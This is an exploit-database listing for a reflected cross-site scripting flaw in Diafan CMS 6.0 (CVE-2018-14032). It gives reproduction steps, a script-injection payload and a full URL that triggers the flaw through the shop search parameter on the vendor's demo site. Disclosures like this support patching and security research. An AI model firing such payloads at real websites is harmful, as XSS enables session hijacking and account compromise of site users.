Advertisement






Diafan CMS 6.0 Cross Site Scripting

CVE Category Price Severity
CVE-2018-14032 CWE-79 Not specified High
Author Risk Exploitation Type Date
Unknown High Remote 2023-06-19
CVSS
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023060047

Below is a copy:

Diafan CMS 6.0 Cross Site Scripting
# Exploit Title: Diafan CMS 6.0 - Reflected Cross-Site Scripting (XSS)
# Exploit Author: tmrswrr / Hulya Karabag
# Vendor Homepage: https://www.diafancms.com/
# Version: 6.0
# Tested on: https://demo.diafancms.com


Description:

1) https://demo.diafancms.com/ Go to main page and write your payload in Search in the goods > Article field:
Payload : "><script>alert(document.domain)<%2Fscript>
2) After will you see alert button : 
https://demo.diafancms.com/shop/?module=shop&action=search&cat_id=0&a=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&pr1=0&pr2=0

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.